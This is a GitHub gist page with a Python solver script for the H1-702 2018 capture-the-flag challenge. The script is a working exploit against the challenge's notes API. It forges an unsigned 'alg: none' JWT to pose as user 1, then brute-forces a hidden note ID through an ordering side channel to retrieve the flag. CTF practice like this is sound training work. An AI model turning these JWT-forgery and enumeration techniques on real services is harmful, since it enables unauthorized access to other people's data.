Skip to content

Instantly share code, notes, and snippets.

@Simpsonpt Simpsonpt/h1-702-ctf.py Secret
Created Jun 23, 2018

Embed
What would you like to do?
H1-702-CTF Solver.
#!/usr/bin/env python
#-*- coding: utf-8 -*-
#
# h1-702-ctf.py
#
# Copyright 2018 @simps0n
#
import jwt,requests,json,time,sys
#API URL
url = "http://159.203.178.9"
#Create JWT Token with ID 1
#jwt = jwt.encode({'id': '1'}, '', algorithm='none')
jwt = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJpZCI6IjEifQ.t4M7We66pxjMgRNGg1RvOmWT6rLtA8ZwJeNP-S8pVak"
#Epoch from the note with the FLAG!
refValue = "1528911533"
alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
def bfFlag():
start = time.time()
bfID = ''
temp = ''
toKeep = False
killswitch = True
while killswitch:
resetNotes()
for char in list(alphabet):
sys.stdout.write(">> Checking Value: "+bfID+char+" ("+str(len(bfID))+")"+"\r")
sys.stdout.flush()
createNote(bfID+char)
#Avoid time issues
time.sleep(1)
#Check the current ID postion After/Before and keep the last "before" char temporarily
if evaluate():
temp = char
toKeep = True
#ID position is after the reference Epoch so the last test char (temp) is to keep
elif toKeep:
#Validate the if the over char is the one!
killswitch = getNote(bfID+char)
if not killswitch:
break
#Update bfID with last known "before" char and check note
bfID += temp
killswitch = getNote(bfID)
toKeep = False
break
resetNotes()
end = time.time()
timetaken = end - start
print ">> Found it in: "+str(timetaken)
def evaluate():
epochs = getNotesMetadata()
if epochs.index(refValue) == 0:
#New note is after..
return False
else:
#New note is before!
return True
def getNotesMetadata():
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp = requests.get(url+'/rpc.php?method=getNotesMetadata', headers=headers)
data = json.loads(rsp.content)
return data['epochs']
def resetNotes():
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp = requests.post(url+'/rpc.php?method=resetNotes',headers=headers)
data = json.loads(rsp.content)
#print data
def createNote(testID):
headers = {'Authorization': jwt,'Accept':'application/notes.api.v2+json'}
postBody = {'note':'NotTheNoteYouAreLookingFor...','id':testID}
rsp = requests.post(url+'/rpc.php?method=createNote',json=postBody,headers=headers)
data = json.loads(rsp.content)
#print data
def getNote(noteID):
headers = {'Authorization': jwt,'Accept':'application/notes.api.v1+json'}
rsp = requests.get(url+'/rpc.php?method=getNote&id='+noteID, headers=headers)
data = json.loads(rsp.content)
if not data.get('epoch') == None:
if data['epoch'] == refValue:
print " API Data: " + str(data)
print ">> Note ID: " + noteID
print ">> Note: " + data['note']
return False
else:
#print "Flag not Found - Try Harder!"
pass
return True
def main(args):
bfFlag()
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.